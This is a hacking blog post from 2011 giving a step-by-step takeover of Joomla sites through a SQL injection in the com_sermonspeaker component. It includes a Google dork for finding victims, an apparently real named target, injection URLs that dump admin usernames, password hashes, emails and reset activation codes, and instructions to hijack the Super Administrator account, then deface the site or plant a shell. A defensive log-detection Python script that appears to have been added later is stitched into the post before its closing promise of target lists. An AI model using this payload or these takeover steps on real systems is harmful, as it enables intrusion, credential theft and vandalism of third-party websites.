Step by step Exploit Joomla | Uphik Lamers

Friday, November 11, 2011

OK, let's get straight to the discussion.

==================================

Code:
* Dork : inurl:option=com_sermonspeaker

Code:
* Exploit : /index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/
===================================

1. First, look for a target on Google.
Dork : inurl:option=com_sermonspeaker

2. Once you have found a target, try applying the exploit. This time our target is http://loichung.com
[Image: 1.jpg]

3. Apply the exploit directly
Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=
-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/

[Image: 2-1.jpg]

4. The username, email and password all come out. Anyone who wants to encrypt the password is welcome to. But this time we will use the forgot-password technique.

Code:
/index.php?option=com_user&view=reset

Just enter the admin's email
[Image: 3.jpg]

5. Then press submit and it will look like this
[Image: 4.jpg]

It asks for an activation code; what now?

Don't worry, let's look for the activation code.
Add ,0x3a,activation after 0x3a,email so that it becomes like this

Code:
/index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email,0x3a,activation)/**/from/**/jos_users/**/

Once we have added ,0x3a,activation after 0x3a,email it will look like this

[Image: 5.jpg]

The activation code comes out; now we just paste the activation code

[Image: 6.jpg]

6. Now press submit again and it will look like this
[Image: 7.jpg]

Now enter a new password of our choosing. After that, press submit again

[Image: 8.jpg]

7. Now we log in as admin via
Code:
http://[site]/[path]/administrator

[Image: 9.jpg]

Enter the admin username and admin password.

[Image: 10.jpg]

And now we have successfully logged in as Super Administrator and are entitled to do anything on the site. From here, please continue on your own.

Whether you want to
* Deface its index
* Plant a shell
* Etc.
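
For defenders, the chain described above leaves a recognisable trail in web server access logs: a `com_sermonspeaker` request whose `id` is not a plain identifier, then a `com_user` reset request and an `/administrator` request from the same client. The detection sketch below is an added example, not part of the original post; the log lines are constructed, and the function names and the assumed shape of a legitimate `id` (digits with an optional `:alias` slug) are hypothetical.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed access-log lines (documentation IP ranges), not real traffic.
SAMPLE_LOG = [
    '192.0.2.44 - - [11/Nov/2011:10:01:30 +0000] "GET /index.php?option=com_sermonspeaker&task=latest_sermons&id=5:sunday-sermon HTTP/1.1" 200 5300',
    '203.0.113.9 - - [11/Nov/2011:10:02:10 +0000] "GET /index.php?option=com_sermonspeaker&task=latest_sermons&id=-9999/**/union/**/select/**/concat(username,0x3a,password,0x3a,email)/**/from/**/jos_users/**/ HTTP/1.1" 200 6010',
    '203.0.113.9 - - [11/Nov/2011:10:03:02 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 4100',
    '198.51.100.7 - - [11/Nov/2011:10:03:40 +0000] "GET /index.php?option=com_user&view=reset HTTP/1.1" 200 4100',
    '203.0.113.9 - - [11/Nov/2011:10:06:15 +0000] "POST /administrator/index.php HTTP/1.1" 303 0',
    '192.0.2.50 - - [11/Nov/2011:10:09:00 +0000] "GET /index.php?option=com_sermonspeaker&id=1%20UnIoN%20SeLeCt%201 HTTP/1.1" 200 5000',
]

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "\S+ (\S+) [^"]*" \d{3}')
SQL_COMMENT = re.compile(r"/\*.*?\*/", re.S)
UNION_SELECT = re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I)
ID_OK = re.compile(r"\d*(?::[\w-]*)?")  # assumption: numeric id, optional ":alias" slug

def classify(target):
    """Label one request target as 'sqli', 'reset', 'admin' or None."""
    url = urlsplit(target)
    q = parse_qs(url.query, keep_blank_values=True)  # also percent-decodes values
    option = q.get("option", [""])[0]
    if option == "com_sermonspeaker":
        raw = q.get("id", [""])[0]
        flat = SQL_COMMENT.sub(" ", raw)  # /**/ stands in for whitespace
        if UNION_SELECT.search(flat) or not ID_OK.fullmatch(raw):
            return "sqli"
    if option == "com_user" and q.get("view", [""])[0] == "reset":
        return "reset"
    if "administrator" in url.path.split("/"):
        return "admin"
    return None

def find_chains(lines):
    """Map client IP -> stages; reset/admin count only after that IP's first injection attempt."""
    chains = {}
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        ip, target = m.groups()
        kind = classify(target)
        if kind == "sqli" or (kind and ip in chains):
            chains.setdefault(ip, []).append(kind)
    return chains

if __name__ == "__main__":
    print(find_chains(SAMPLE_LOG))
```

Log matching of this kind is a backstop: the underlying fix is for the component to treat `id` as an integer or bind it as a query parameter, and for the site to run a patched version.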

For friends who have trouble finding a target, here I give targets + the exploit